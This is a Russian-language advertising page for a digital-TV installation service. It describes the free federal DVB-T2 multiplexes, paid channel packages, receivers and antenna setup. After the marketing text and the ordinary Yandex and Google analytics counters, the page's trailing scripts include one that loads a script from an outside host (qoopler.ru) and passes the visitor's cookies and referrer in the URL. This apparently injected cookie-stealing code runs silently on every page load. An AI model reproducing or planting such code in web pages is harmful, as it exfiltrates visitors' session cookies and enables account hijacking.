Каналы цифрового телевидения
+7(495) 776-73-79 9:00 - 22:00 | Без выходных

Каналы цифрового телевидения

Качественные и сверхчеткие каналы цифрового телевидения в России доступны совершенно бесплатно. Согласно постановлению Правительства, пакет эфирных ТВ-частот вещает на территории страны в современном формате DVB-T2, и для подключения к ним необходим лишь телевизор, антенна и ресивер, принимающий этот формат сигнала. В современных моделях телевизоров все необходимое оборудование зачастую бывает встроенным.

Указом президента для обеспечения населения социально значимой информацией определен список каналов, которые предоставляются бесплатно и входят в комплект общероссийских обязательных общедоступных каналов. На данный момент в него входят 20 каналов цифрового телевидения, так называемые федеральные телеканалы. Этот перечень поделен на 2 мультиплекса – пакета каналов, которые вместе занимают одну частоту, то есть поставляются только комплектом.

По этой причине невозможно «поймать» один федеральный канал в цифровом качестве – на частоте размещен весь мультиплекс, поэтому или доступен десяток, или не доступен ни один. Поскольку единственным оператором было назначено ФГУП «Российская телевизионная и радиовещательная сеть», мультиплексы получили названия РТРС-1 и РТРС-2. Планируется запуск третьего комплекта, но подготовка проекта была временно отложена.

На территории Москвы и Подмосковья с Останкинской телебашни вещает дополнительный мультиплекс. В его состав входит 40 телеканалов, но вещают они лишь на 10 частотах, сменяя друг друга на протяжении суток. Такие метаморфозы были вызваны вступлением в силу изменений в ФЗ «О рекламе».



Цифровые ТВ-каналы на любой вкус

Конечно, федеральными каналами вещание в цифре не ограничивается. Каналы цифрового телевидения в огромном количестве доступны у различных операторов ТВ-вещания. Как правило, они объединяются в различные пакеты разной стоимости.

Но цифровое эфирное телевидение, состоящее из обязательного комплекта, все операторы ТВ-вещания предоставляют совершенно бесплатно, возлагая на себя все расходы по трансляции. В список бесплатных входит весьма разнообразный набор каналов от строго информационных до развлекательных и музыкальных.

При этом различные компании предлагают пользователям дополнить список эфирных каналов дополнительными пакетами вещания и даже персональными подписками на конкретную платную частоту. Каналы цифрового телевидения в базовых платных комплектациях иногда стоит незначительно выше привычного аналогового сигнала, но качество передачи изображения, четкость картинки и насыщенность цветов в современном формате несопоставимо выше.

Наслаждение любимыми каналами при помощи современного оборудования

Цифровые ресиверы, которые позволяют просматривать каналы цифрового телевидения, представлены в разнообразных вариациях и доступны как с базовым функционалом, так и с весьма расширенным. Наиболее современные модели обладают даже такими функциями, как запись и перемотка эфира, постановка ТВ-сигнала на паузу и другими замечательными возможностями. Именно с таким прибором можно прочувствовать достижения технической мысли последних лет и их проявление в телевизионном формате.

Но главным требованием к цифровому приемнику является поддержка стандартов работы DVB-T2, поскольку в скором времени все цифровое вещание в России будет переведено именно на этот многофункциональный формат, открывая пользователям массу дополнительных возможностей. Наши специалисты всегда готовы проконсультировать вас по вопросу приобретения цифрового оборудования, выбора и установки антенны для поиска сигнала, покупки и подключения ресивера. А также профессионалы быстро настроят вещание каналов цифрового телевидения и произведут необходимые настройки.

Мощная помощь в освоении технологий

Сигнал эфирных цифровых каналов распространяется через наземные станции-ретрансляторы. Соответственно, для приема требуется антенна, и от места ее установки зачастую зависит качество и мощность сигнала. Если высоты установки антенны не хватает для четкой фиксации сигнала телевышки, то она монтируется на мачту для более высокого размещения. Так, каналы цифрового телевидения будут доступнее даже в условиях плохой погоды, которая все же влияет на качество распространения информации через телевышки.

Однако, переход на цифровой метод вещания с каждым годом ощущается все сильнее. Растет число цифровых ТВ-операторов, увеличивается стабильная зона покрытия эфирного ТВ РТРС, расширяется функционал не только цифрового сигнала, но и приставок для его приема.

Обращение в нашу компанию позволит вам как можно раньше прочувствовать все преимущества цифрового сигнала и перейти на наиболее современный стандарт вещания в свое удовольствие и на зависть всем соседям!

(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter32184314 = new Ya.Metrika({ id:32184314, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); type="text/j-avascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24167089 = new Ya.Metrika({id:24167089, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-68618183-1', 'auto'); ga('send', 'pageview'); try { var yaCounter37438800 = new Ya.Metrika({ id:37438800, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window);